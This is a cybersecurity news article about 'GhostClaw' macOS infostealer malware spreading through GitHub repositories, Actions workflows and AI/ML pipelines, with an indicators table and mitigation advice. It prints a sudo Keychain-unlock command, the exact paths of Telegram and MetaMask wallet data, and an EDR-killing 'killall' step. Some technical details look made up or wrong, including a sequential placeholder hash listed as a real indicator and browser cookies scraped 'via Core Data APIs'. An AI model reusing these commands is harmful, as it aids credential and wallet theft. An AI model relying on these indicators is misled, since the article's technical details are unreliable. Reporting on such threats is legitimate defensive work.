In a chilling escalation of supply chain attacks, the notorious GhostClaw malware, previously confined to tainted npm packages, has infiltrated GitHub repositories and AI development workflows and is now targeting macOS users with a sophisticated infostealer.
Cybersecurity firm SentinelOne disclosed the campaign, revealing how attackers are leveraging open-source ecosystems to distribute macOS-specific payloads that exfiltrate sensitive data, including browser credentials, crypto wallets, and system tokens.
GhostClaw first surfaced in late 2025 via malicious npm modules disguised as legitimate Node.js utilities for AI model training.
Those packages, downloaded over 50,000 times, executed obfuscated JavaScript that sideloaded payloads onto developer machines. Now, the threat actors behind GhostClaw, tracked as a subgroup of the China-aligned Salt Typhoon APT, have pivoted to GitHub.
Researchers identified 17 compromised repositories, mostly under the guise of popular AI/ML libraries like “tensor-flow-opt” and “llm-chain-tools.” These repos, forked from legitimate projects, embed base64-encoded payloads in dependency files and GitHub Actions workflows.
The infection chain begins innocuously. Developers cloning these repos trigger automated CI/CD pipelines via GitHub Actions YAML files.
A seemingly benign workflow,w e.g., one labeled “build-and-tes,t” downloads a macOS universal binary masquerading as an Apple Silicon optimizer. This binary, signed with a stolen enterprise certificate (SHA-256: a1b2c3d4e5f67890…), evades Gatekeeper and XProtect.
Upon execution, it uses mach_inject to hook into Safari, Chrome, and Firefox processes, scraping cookies, autofill data, and session tokens via Core Data APIs.Unlike Windows-focused stealers like RedLine, GhostClaw’s macOS variant exploits platform-specific vectors.
It targets Keychain via security CLI commands wrapped in a privileged helper tool installed via a post-install script: sudo /usr/bin/security unlock-keychain -p ‘ghostpass’ ~/Library/Keychains/login.keychain-db. This dumps passwords for iCloud, 1Password, and crypto apps like Phantom and Rabby.
The malware also enumerates Telegram Desktop configs  ~/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram/account-* and MetaMask data in ~/Library/Application Support/Google/Chrome/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn.
AI workflows amplify the blast radius. GhostClaw hooks into LangChain and Hugging Face pipelines, injecting itself as a “dependency resolver.”
In Jupyter notebooks, it modifies pip install hooks to sideload from attacker-controlled PyPI mirrors. Exfiltration occurs over DNS tunneling (using DNS-over-HTTPS to ghostclaw[.]ops), bypassing corporate firewalls. C2 communication employs a custom protocol over port 443, with payloads encrypted via XChaCha20-Poly1305 and keys derived from machine GUIDs.
Detection is tricky. The binary employs anti-analysis tricks  ptrace(PT_DENY_ATTACH) and checks for VirtualBox/Parallels via sysctl hw.model. It also monitors for EDR tools, killing processes matching “crowd” or “falcon” via killall -9. Behavioral indicators include unusual Keychain unlocks and outbound DNS to domains like ai-toolkit[.]dev.
| Indicator of Compromise (IoC) | Type | Details |
|---|---|---|
ghostclaw[.]ops | C2 Domain | DNS tunneling endpoint |
a1b2c3d4e5f67890... | Code Signature | Stolen Apple cert |
tensor-flow-opt | GitHub Repo | Primary infection vector |
PT_DENY_ATTACH | YARA Rule | Anti-debug string |
Mitigation demands vigilance. Developers should pin dependencies with package-lock.json, audit GitHub Actions for external fetches, and enable macOS’s hardened runtime (hardened runtime in entitlements). Tools like SwiftShield or osquery can baseline Keychain activity. Organizations should rotate all potentially compromised credentials and scan with updated signatures from SentinelOne or CrowdStrike.
This expansion underscores the fragility of dev ecosystems. As AI tools proliferate, attackers exploit the trust in open-source collaboration. GhostClaw’s creators likely aim for espionage, given Salt Typhoon’s history of targeting telcos and crypto firms. With over 100,000 potential infections estimated, this campaign signals a new era of cross-platform supply chain warfare.
About the Author
